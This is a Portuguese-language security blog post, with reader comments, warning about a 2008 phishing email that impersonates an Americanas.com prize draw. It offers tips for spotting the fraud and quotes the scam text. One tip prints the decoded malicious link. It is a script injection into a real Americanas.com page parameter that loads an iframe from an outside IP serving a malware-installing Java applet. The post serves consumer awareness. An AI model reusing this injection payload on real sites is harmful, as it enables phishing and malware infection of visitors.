Segurança

AMERICANAS.COM – Voce foi sorteado!

Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.

Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

  1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
  2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
  3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:

    http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML='<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

  4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

Mensagem original (screenshot)

Flickr: Americanas.com Você foi Sorteado

Tela que simula o site Americanas.com (screenshot)

Flickr: Americanas.com Você foi Sorteado

Mensagem original (texto)

Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

Sempre confira se o link é para o site verdadeiro da Americanas.com

Nunca informe sua senha para terceiros.

Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

Mensagem recebida por e-mail em 16/04/2008

Acabei de receber esse e-mail e também vim pesquisar para saber se era verdade. Que pena que não é… Que ótimo terem postado essa notícia. Sempre dou uma pesquisada antes de abrir esses e-mails muito vantajosos.

Tambem recebi o e-mail, como ele é muito bem elaborado, antes de abrir, fui pesquisar quanto a promoção, visto que no email não faz referencia a nenhum regulamento da referida promoção. Pesquisando encontrei de cara este post… Parabens! E muita atenção para não cair em golpes como este.

É vírus ou spyware. Recebi essa mensagem no meu celu, mas apenas meu filho tem o número o qual tb recebeu a mesma mensagem semana passada… Tá ficando difícil…

também recebi a mensagem, sem dúvida é falso, vi que o IP que o link aponta aparece em outras tentativas de golpe.

não há duvida mas isso é falso.

Por tudo o que tem aqui. Liguei pra americanas e porque nem aparece o email da gente no campo para:
se vc não gosta de virus, spywares etc. não clique nesse link.